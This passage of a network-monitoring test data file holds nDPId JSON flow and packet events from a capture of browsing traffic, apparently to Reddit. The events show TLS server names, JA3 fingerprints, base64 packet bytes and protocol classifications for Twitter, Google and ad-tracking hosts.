{"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01459{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3174,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291687800,"flow_last_seen":1605291688046,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3956,"flow_avg_l4_payload_len":439,"midstream":0,"thread_ts_msec":1605291688046,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","server_names":"syndication.twitter.com,syndication.twimg.com,syndication-o.twitter.com,syndication-o.twimg.com,cdn.syndication.twitter.com,cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Twitter, Inc., OU=lon3, CN=syndication.twitter.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"09:D3:FE:9A:3E:39:A7:E2:90:5B:C9:1F:3B:7D:CE:7C:7E:08:1C:6F"}} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3346,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688324,"flow_last_seen":1605291688324,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688324,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3346,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1605291688324,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688324,"pkt":"qtsDr8lk5EKm5WPyht1gDP1bACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADYOtHmx5wBu0pXpjQAAAAAoAL9INe7AAACBAWgBAIICn8mSwwAAAAAAQMDBw=="} 
+00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3358,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688336,"flow_last_seen":1605291688336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688336,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3358,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1605291688336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688336,"pkt":"qtsDr8lk5EKm5WPyht1gC0OFACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADYOtHmx54BuzYIpzgAAAAAoAL9IOr4AAACBAWgBAIICn8mSxgAAAAAAQMDBw=="} +00628{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3372,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688344,"flow_last_seen":1605291688344,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688344,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3372,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1605291688344,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688344,"pkt":"qtsDr8lk5EKm5WPyht1gATUNACgGQCoBywEgSYsHmR3shSjf9ikmAJAAIZzuAAAGROP4wJOh23oBu4m0PmAAAAAAoAL9ICpwAAACBAWgBAIICgi3lpgAAAAAAQMDBw=="} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3437,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1605291688365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688365,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAANg60eYqAcsBIEmLB5kd7IUo3\/YpAbvHnC63k25KV6Y1oBJXgLbhAAACBAV4AQMDAwQCCArC10GYfyZLDA=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3438,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1605291688365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688365,"pkt":"qtsDr8lk5EKm5WPyht1gDP1bACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADYOtHmx5wBu0pXpjUut5NvgBAB+zrKAAABAQgKfyZLNcLXQZg="} 
+00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3439,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688324,"flow_last_seen":1605291688365,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688365,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3440,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1605291688370,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688370,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAANg60eYqAcsBIEmLB5kd7IUo3\/YpAbvHnlMkjxA2CKc5oBJXgKoEAAACBAV4AQMDAwQCCArC10GjfyZLGA=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3444,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1605291688370,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688370,"pkt":"qtsDr8lk5EKm5WPyht1gC0OFACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADYOtHmx54BuzYIpzlTJI8RgBAB+y30AAABAQgKfyZLOsLXQaM="} 
+00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3446,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688336,"flow_last_seen":1605291688371,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688371,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3449,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1605291688371,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688371,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYAkAAhnO4AAAZE4\/jAk6EqAcsBIEmLB5kd7IUo3\/YpAbvbeuzTe9OJtD5hoBJXgGMHAAACBAV4AQMDAwQCCArC10GlCLeWmA=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3451,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1605291688371,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688371,"pkt":"qtsDr8lk5EKm5WPyht1gATUNACAGQCoBywEgSYsHmR3shSjf9ikmAJAAIZzuAAAGROP4wJOh23oBu4m0PmHs03vUgBAB++b9AAABAQgKCLeWs8LXQaU="} 
+00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3453,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688344,"flow_last_seen":1605291688372,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688372,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rules.quantcount.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3517,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688324,"flow_last_seen":1605291688408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688408,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3521,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688336,"flow_last_seen":1605291688408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688408,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3538,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688344,"flow_last_seen":1605291688411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688411,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"rules.quantcount.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3906,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688611,"flow_last_seen":1605291688611,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688611,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3906,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1605291688611,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688611,"pkt":"qtsDr8lk5EKm5WPyht1gDEO\/ACgGQCoBywEgSYsHmR3shSjf9ikmBigAATQaDRQpB0IHggC2mzgBu\/F3Z44AAAAAoAL9IIe6AAACBAWgBAIICvY2BR4AAAAAAQMDBw=="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3908,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1605291688654,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688654,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYGKAABNBoNFCkHQgeCALYqAcsBIEmLB5kd7IUo3\/YpAbubOJS20cTxd2ePoBJXgMFkAAACBAV4AQMDAwQCCArC10K+9jYFHg=="} 
+00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3910,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1605291688654,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688654,"pkt":"qtsDr8lk5EKm5WPyht1gDEO\/ACAGQCoBywEgSYsHmR3shSjf9ikmBigAATQaDRQpB0IHggC2mzgBu\/F3Z4+UttHFgBAB+0VLAAABAQgK9jYFScLXQr4="} +00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3911,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688611,"flow_last_seen":1605291688654,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688654,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3999,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688611,"flow_last_seen":1605291688705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1605291688705,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4030,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688712,"flow_last_seen":1605291688712,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688712,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4030,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1605291688712,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688712,"pkt":"qtsDr8lk5EKm5WPyht1gBqw+ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACAG1cYBu1QhHQQAAAAAoAL9IGnKAAACBAWgBAIICoWLJ5EAAAAAAQMDBw=="} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4145,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688749,"flow_last_seen":1605291688749,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688749,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4145,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1605291688749,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688749,"pkt":"qtsDr8lk5EKm5WPyht1gCJDMACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAE38IBu+NAO7IAAAAAoAL9ICgwAAACBAWgBAIICm3\/yPIAAAAAAQMDBw=="} 
+00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4156,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1605291688754,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688754,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAYqAcsBIEmLB5kd7IUo3\/YpAbvVxjGyAqhUIR0FoBJXgNU8AAACBAV4AQMDAwQCCArC10MXhYsnkQ=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4158,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1605291688754,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688754,"pkt":"qtsDr8lk5EKm5WPyht1gBqw+ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACAG1cYBu1QhHQUxsgKpgBAB+1kkAAABAQgKhYsnu8LXQxc="} +00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4161,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688712,"flow_last_seen":1605291688754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688754,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4267,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1605291688786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688786,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgFAAAAAAAAIAQqAcsBIEmLB5kd7IUo3\/YpAbvfwoEYYXPjQDuzoBJXgOVIAAACBAV4AQMDAwQCCArC10M\/bf\/I8g=="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4268,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1605291688786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688786,"pkt":"qtsDr8lk5EKm5WPyht1gCJDMACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAE38IBu+NAO7OBGGF0gBAB+2k0AAABAQgKbf\/JGMLXQz8="} +00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4269,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688749,"flow_last_seen":1605291688786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688786,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
